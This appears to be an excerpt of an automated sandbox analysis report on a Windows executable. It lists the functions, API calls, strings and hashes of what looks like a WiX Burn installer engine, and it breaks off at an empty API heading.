Opcode Fuzzy Hash: 0adb5cdb182afba65455a253b7610dadc8a6c26c11e5f6a551c3c8f3206af504
Instruction Fuzzy Hash: A8F0A4B6A4013AABD7209F85990595EFFADFF54720B01411AFE44A7340E770AD00DBD4

Function 00500E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00500E28

Strings

AdvApi32.dll, xrefs: 00500E0D
RegDeleteKeyExW, xrefs: 00500E1D

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: c111468abdb0d7b33b04adc77865c64c7b79731f76e9a4b2ca687242c338d507
Instruction ID: 04fe2754e0f67991dbe7f58b88cbe2037a1d9f4b835ff6448b9e98714aa40dff
Opcode Fuzzy Hash: c111468abdb0d7b33b04adc77865c64c7b79731f76e9a4b2ca687242c338d507
Instruction Fuzzy Hash: 96E08C705012209AE7709F10FC05B057F90BF33B08F004224E804A65F0C3B66849EB90

Analysis Process: BkTwXj17DH.exePID: 7828, Parent PID: 7768COMMON

Executed Functions

Function 00D51070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D533C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00D510DD,?,00000000), ref: 00D533E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00D510F6

Part of subcall function 00D51175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00D5111A,cabinet.dll,00000009,?,?,00000000), ref: 00D51186
Part of subcall function 00D51175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00D5111A,cabinet.dll,00000009,?,?,00000000), ref: 00D51191
Part of subcall function 00D51175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D5119F
Part of subcall function 00D51175: GetLastError.KERNEL32(?,?,?,?,?,00D5111A,cabinet.dll,00000009,?,?,00000000), ref: 00D511BA
Part of subcall function 00D51175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D511C2
Part of subcall function 00D51175: GetLastError.KERNEL32(?,?,?,?,?,00D5111A,cabinet.dll,00000009,?,?,00000000), ref: 00D511D7

CloseHandle.KERNEL32(?,?,?,?,00D9B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00D51131

Strings

crypt32.dll, xrefs: 00D510CA
wininet.dll, xrefs: 00D510AE
feclient.dll, xrefs: 00D510D1
comres.dll, xrefs: 00D510B5
clbcatq.dll, xrefs: 00D510BC
version.dll, xrefs: 00D510A7
msi.dll, xrefs: 00D510A0
msasn1.dll, xrefs: 00D510C3
cabinet.dll, xrefs: 00D51099, 00D51114

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: 0f8c7fa71079072b9cd6fd7be0743de2a54cedaf3ba9ebe64dc9be3da1b447e9
Instruction ID: 38d471405f6fbad9883c8848de0f1edfd2bdc0ee7d457e3d39f3b17abfaf8183
Opcode Fuzzy Hash: 0f8c7fa71079072b9cd6fd7be0743de2a54cedaf3ba9ebe64dc9be3da1b447e9
Instruction Fuzzy Hash: EB217C7190071CABDF10AFA4ED45FEEBBB8EB09725F11415AEE10B7281D77099088BB0

Function 00D8FEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00DBB5FC,00000000,?,?,?,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D8FEF4
GetCurrentProcessId.KERNEL32(00000000,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D8FF04
GetCurrentThreadId.KERNEL32 ref: 00D8FF0D
GetLocalTime.KERNEL32(8000FFFF,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D8FF23
LeaveCriticalSection.KERNEL32(00DBB5FC,00D6E93B,?,00000000,0000FDE9,?,00D6E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D9001A

Strings

%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00D8FFC0

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
API String ID: 296830338-59366893
Opcode ID: fbc0bf6715c6601e6a8411aa1a9d93913402fee58af7ae56d5407c9934a57c20
Instruction ID: 67d73405ead6b616e181073111dd4b7266a6c2c7bcc8bb49b0df48ee09d0f8ff
Opcode Fuzzy Hash: fbc0bf6715c6601e6a8411aa1a9d93913402fee58af7ae56d5407c9934a57c20
Instruction Fuzzy Hash: F1418171D01219EFDF219FA4E804ABEBBB8EF08B21F044526FA01E6250D7388D44DBB1

Function 00D6A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed create working folder., xrefs: 00D6A0EE
Failed to copy working folder., xrefs: 00D6A116
Failed to calculate working folder to ensure it exists., xrefs: 00D6A0D8

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 0f953418dab695e8459e5bd840e76abac718cd7a9e552fd31b634aca1e5c518d
Instruction ID: a3caa0a0212e09be3067b6dfc909c8ded6989400ee5a4e79bae5e22b7ab5ced0
Opcode Fuzzy Hash: 0f953418dab695e8459e5bd840e76abac718cd7a9e552fd31b634aca1e5c518d
Instruction Fuzzy Hash: B201A732901728FF8F229B59DD06C9EBF79DF46B20B144256FC4076211DB35DE40AAB5

Function 00D5DF33 Relevance: 126.6, APIs: 11, Strings: 61, Instructions: 646COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00D5E058
SysFreeString.OLEAUT32(00000000), ref: 00D5E736

Part of subcall function 00D5394F: GetProcessHeap.KERNEL32(?,?,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53960
Part of subcall function 00D5394F: RtlAllocateHeap.NTDLL(00000000,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53967

Strings

MsiPackage, xrefs: 00D5E395
Failed to allocate memory for patch sequence information to package lookup., xrefs: 00D5E570
RollbackLogPathVariable, xrefs: 00D5E299
yes, xrefs: 00D5E187
ExePackage, xrefs: 00D5E357
Failed to parse payload references., xrefs: 00D5E6B1
Failed to get @RollbackLogPathVariable., xrefs: 00D5E4EF
Failed to get next node., xrefs: 00D5E708
Failed to parse target product codes., xrefs: 00D5E69B
Failed to allocate memory for rollback boundary structs., xrefs: 00D5DFCA
package.cpp, xrefs: 00D5DFBE, 00D5E0E3, 00D5E4CF, 00D5E564
Failed to get rollback bundary node count., xrefs: 00D5DF8E
cabinet.dll, xrefs: 00D5E1FE
Failed to get @Id., xrefs: 00D5E701
Cache, xrefs: 00D5E14B
`5w, xrefs: 00D5E058, 00D5E47B, 00D5E736
Failed to get @Cache., xrefs: 00D5E6FA
Invalid cache type: %ls, xrefs: 00D5E6EA
Failed to parse EXE package., xrefs: 00D5E389
Failed to parse dependency providers., xrefs: 00D5E6AA
Failed to select package nodes., xrefs: 00D5E094
Failed to parse MSI package., xrefs: 00D5E3C1
comres.dll, xrefs: 00D5E234
Vital, xrefs: 00D5E027, 00D5E25B
Failed to get @PerMachine., xrefs: 00D5E6C6
InstallCondition, xrefs: 00D5E2BC
Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage, xrefs: 00D5E081
wininet.dll, xrefs: 00D5E25A
LogPathVariable, xrefs: 00D5E276
Size, xrefs: 00D5E1E4
Failed to get @Size., xrefs: 00D5E6D4
MspPackage, xrefs: 00D5E3CD
Failed to get @RollbackBoundaryBackward., xrefs: 00D5E527
always, xrefs: 00D5E1A7
Failed to get @LogPathVariable., xrefs: 00D5E4E5
clbcatq.dll, xrefs: 00D5E219
Failed to get @RollbackBoundaryForward., xrefs: 00D5E510
Failed to select rollback boundary nodes., xrefs: 00D5DF69
RollbackBoundaryForward, xrefs: 00D5E2DF
Failed to parse MSU package., xrefs: 00D5E53B
RollbackBoundary, xrefs: 00D5DF56
Permanent, xrefs: 00D5E235
Failed to get @InstallCondition., xrefs: 00D5E4F9
Failed to allocate memory for package structs., xrefs: 00D5E0EF
Failed to find forward transaction boundary: %ls, xrefs: 00D5E506
Failed to get @Permanent., xrefs: 00D5E6BF
InstallSize, xrefs: 00D5E1FF
feclient.dll, xrefs: 00D5E298
msi.dll, xrefs: 00D5E1C8
Failed to find backward transaction boundary: %ls, xrefs: 00D5E51D
CacheId, xrefs: 00D5E1C9
crypt32.dll, xrefs: 00D5E2BB
MsuPackage, xrefs: 00D5E406
Failed to get @InstallSize., xrefs: 00D5E6CD
Failed to parse MSP package., xrefs: 00D5E531
Failed to get package node count., xrefs: 00D5E0B1
RollbackBoundaryBackward, xrefs: 00D5E319
Failed to get @Vital., xrefs: 00D5E6B8
PerMachine, xrefs: 00D5E21A
Failed to allocate memory for MSP patch sequence information., xrefs: 00D5E4DB
Failed to get @CacheId., xrefs: 00D5E6DB

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: FreeHeapString$AllocateProcess
String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`5w$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
API String ID: 336948655-885345141
Opcode ID: 5b8bf96d3d9a757ebdc5f53a2a597ac2f2f7445974cb52d2e858f90b40fc6455
Instruction ID: ba181989536e15f4689b665c57af36c953b95c175d256d16a13139b6170041d9
Opcode Fuzzy Hash: 5b8bf96d3d9a757ebdc5f53a2a597ac2f2f7445974cb52d2e858f90b40fc6455
Instruction Fuzzy Hash: F032B031D44226EFCF15AF54CC41BAEBBA5AF04762F254665ED10BB290D770EE088BB0

Function 00D5F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Comments, xrefs: 00D5FCA9
Failed to select registration node., xrefs: 00D5FA1C
yes, xrefs: 00D5FD36
Failed to get @AboutUrl., xrefs: 00D5FC4E
Failed to parse software tag., xrefs: 00D5FE10
Failed to get @DisableModify., xrefs: 00D5FDB8
ParentDisplayName, xrefs: 00D5FC81
Failed to get @Department., xrefs: 00D5FE8E
UpdateUrl, xrefs: 00D5FC5C
ProductFamily, xrefs: 00D5FE9C
Failed to get @ExecutableName., xrefs: 00D5FB07
Failed to get @ParentDisplayName., xrefs: 00D5FC98
Publisher, xrefs: 00D5FBC8
Failed to get @Id., xrefs: 00D5FA49
Update, xrefs: 00D5FE1E
Invalid modify disabled type: %ls, xrefs: 00D5FD94
Name, xrefs: 00D5FEC1
AboutUrl, xrefs: 00D5FC37
Arp, xrefs: 00D5FB33
Manufacturer, xrefs: 00D5FE53
registration.cpp, xrefs: 00D5FD87
Failed to get @Register., xrefs: 00D5FB70
Failed to select Update node., xrefs: 00D5FE3C
Failed to get @Contact., xrefs: 00D5FCE8
DisableRemove, xrefs: 00D5FDC9
Failed to get @PerMachine., xrefs: 00D5FB25
ProviderKey, xrefs: 00D5FAD3
DisplayVersion, xrefs: 00D5FBA3
Tag, xrefs: 00D5FA57
Failed to get @ProductFamily., xrefs: 00D5FEB3
Failed to get @HelpTelephone., xrefs: 00D5FC29
Failed to get @Name., xrefs: 00D5FED4
Register, xrefs: 00D5FB5D
ExecutableName, xrefs: 00D5FAF4
Registration, xrefs: 00D5F9FD
Failed to parse @Version: %ls, xrefs: 00D5FAC5
Failed to get @Publisher., xrefs: 00D5FBDF
Failed to get @Manufacturer., xrefs: 00D5FE66
Failed to select ARP node., xrefs: 00D5FB4F
DisplayName, xrefs: 00D5FB7E
Failed to set registration paths., xrefs: 00D5FF08
button, xrefs: 00D5FD15
Contact, xrefs: 00D5FCD1
HelpTelephone, xrefs: 00D5FC12
Failed to get @Version., xrefs: 00D5FAA4
DisableModify, xrefs: 00D5FCF6
Failed to get @Comments., xrefs: 00D5FCC0
Failed to get @DisableRemove., xrefs: 00D5FDE0
Failed to get @Tag., xrefs: 00D5FA6A
Failed to get @DisplayName., xrefs: 00D5FB95
Failed to parse related bundles, xrefs: 00D5FA83
Failed to get @HelpLink., xrefs: 00D5FC04
Failed to get @UpdateUrl., xrefs: 00D5FC73
Failed to get @Classification., xrefs: 00D5FEF5
Failed to get @ProviderKey., xrefs: 00D5FAE6
Department, xrefs: 00D5FE77
Classification, xrefs: 00D5FEE2
HelpLink, xrefs: 00D5FBED
PerMachine, xrefs: 00D5FB12
Version, xrefs: 00D5FA91
Failed to get @DisplayVersion., xrefs: 00D5FBBA

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
API String ID: 760788290-2956246334
Opcode ID: d4c0af084c7937657508fe43349d26e4e6457bec5a32873953e391d9b695f376
Instruction ID: d070e111323920bc109c5275989c7ccbadd5e21f4c242160d21f369e56f6f4db
Opcode Fuzzy Hash: d4c0af084c7937657508fe43349d26e4e6457bec5a32873953e391d9b695f376
Instruction Fuzzy Hash: 8EE1B33AE44665BECF119BA4CC42EBEB6A8EF06712F150231FD11FA191D7619D0C96F0

Function 00D5B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00D5B502
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B550
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00D5B556
ReadFile.KERNELBASE(00000000,00D54461,00000040,?,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B59E
GetLastError.KERNEL32(?,?,?,00000000,7744C3F0,00000000), ref: 00D5B5A4
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B601
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B607
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B650
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B656
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B6C7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B6CD
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B716
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B71C
ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B765
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B76B
SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B7B7
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B7BD

Part of subcall function 00D5394F: GetProcessHeap.KERNEL32(?,?,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53960
Part of subcall function 00D5394F: RtlAllocateHeap.NTDLL(00000000,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53967

ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B810
ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B872
SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B8FC
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7744C3F0,00000000), ref: 00D5B906

Strings

Failed to seek to start of file., xrefs: 00D5B581
Failed to allocate memory for container sizes., xrefs: 00D5BAD3
Failed to read signature offset., xrefs: 00D5B747
Failed to seek past optional headers., xrefs: 00D5B7EB
.wix, xrefs: 00D5B830
Failed to read section info, unsupported version: %08x, xrefs: 00D5B9F5
Failed to read image section header, index: %u, xrefs: 00D5BBAC
Failed to find Burn section., xrefs: 00D5BB32
Failed to get total size of bundle., xrefs: 00D5BA23
Failed to read complete section info., xrefs: 00D5B9C5
Failed to read NT header., xrefs: 00D5B681
Failed to read DOS header., xrefs: 00D5B5CF
Failed to read complete image section header, index: %u, xrefs: 00D5BB75
Failed to seek to section info., xrefs: 00D5B6F8, 00D5B934
4, xrefs: 00D5B884
Failed to find valid DOS image header in buffer., xrefs: 00D5BBEB
Failed to read section info., xrefs: 00D5B999
PE, xrefs: 00D5B698
burn, xrefs: 00D5B838
section.cpp, xrefs: 00D5B523, 00D5B577, 00D5B5C5, 00D5B628, 00D5B677, 00D5B6EE, 00D5B73D, 00D5B78C, 00D5B7E1, 00D5B898, 00D5B8D8, 00D5B92A, 00D5B98F, 00D5B9B9, 00D5B9E0, 00D5BAC7, 00D5BB07, 00D5BB26, 00D5BB63, 00D5BBA1, 00D5BBC4, 00D5BBDF
Failed to read signature size., xrefs: 00D5B796
Failed to allocate buffer for section info., xrefs: 00D5B8E4
Failed to read section info, data to short: %u, xrefs: 00D5B8AA
(, xrefs: 00D5B81D
Failed to seek to NT header., xrefs: 00D5B632
PE Header from file didn't match PE Header in memory., xrefs: 00D5BB11
Failed to open handle to engine process path., xrefs: 00D5B52D
Failed to find valid NT image header in buffer., xrefs: 00D5BBD0

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
API String ID: 3411815225-695169583
Opcode ID: 8ad82929e77510fc4df6d62b341069db0b7817ba9e8fe2bb913937266e98c361
Instruction ID: a57eac0246fe740de9f1e59441936486889fcd96aa13b8fd1d79e69cb218f359
Opcode Fuzzy Hash: 8ad82929e77510fc4df6d62b341069db0b7817ba9e8fe2bb913937266e98c361
Instruction Fuzzy Hash: A912C672A40235ABDF34DB558C45FAA7BA4EF04762F154196FD08AB281E770DD488BF0

Function 00D70D16 Relevance: 54.6, APIs: 20, Strings: 11, Instructions: 306
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,?,00D708BC,?,?), ref: 00D70D25
GetLastError.KERNEL32(?,?,?,?,00D708BC,?,?), ref: 00D70D2F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00D708BC,?,?), ref: 00D70D74
GetLastError.KERNEL32(?,?,?,?,00D708BC,?,?), ref: 00D70D7F
ResetEvent.KERNEL32(?,?,?,?,?,00D708BC,?,?), ref: 00D70DB7
GetLastError.KERNEL32(?,?,?,?,00D708BC,?,?), ref: 00D70DC1

Strings

Failed to create file: %ls, xrefs: 00D71001
Failed to reset begin operation event., xrefs: 00D70DEF, 00D70F2B
Failed to set operation complete event., xrefs: 00D70D5D, 00D70E9E
Invalid operation for this state., xrefs: 00D70E1D
Failed to set end of file., xrefs: 00D71094
Failed to copy stream name: %ls, xrefs: 00D70E50
Failed to wait for begin operation event., xrefs: 00D70DAD, 00D70EE6
Failed to allocate buffer for stream., xrefs: 00D70F93
cabextract.cpp, xrefs: 00D70D53, 00D70DA3, 00D70DE5, 00D70E11, 00D70E94, 00D70EDC, 00D70F21, 00D70F89, 00D70FF4, 00D71045, 00D7108A, 00D710CE
Failed to set file pointer to beginning of file., xrefs: 00D710D8
Failed to set file pointer to end of file., xrefs: 00D7104F

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorLast$Event$ObjectResetSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 1865021742-2104912459
Opcode ID: 785d3f17a4829c669dfa268780758d8ed93eb4671d00c5f20d9b3c6e129fcd6d
Instruction ID: e26456ab711df544877805414ab00de4d57e8b0d817315673805ecd023eb67a7
Opcode Fuzzy Hash: 785d3f17a4829c669dfa268780758d8ed93eb4671d00c5f20d9b3c6e129fcd6d
Instruction Fuzzy Hash: E891F837A80732ABD73116A95E09B2A6D54BF01B70F168716BE58BA6C0F751DC0486F2

Function 00D55195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

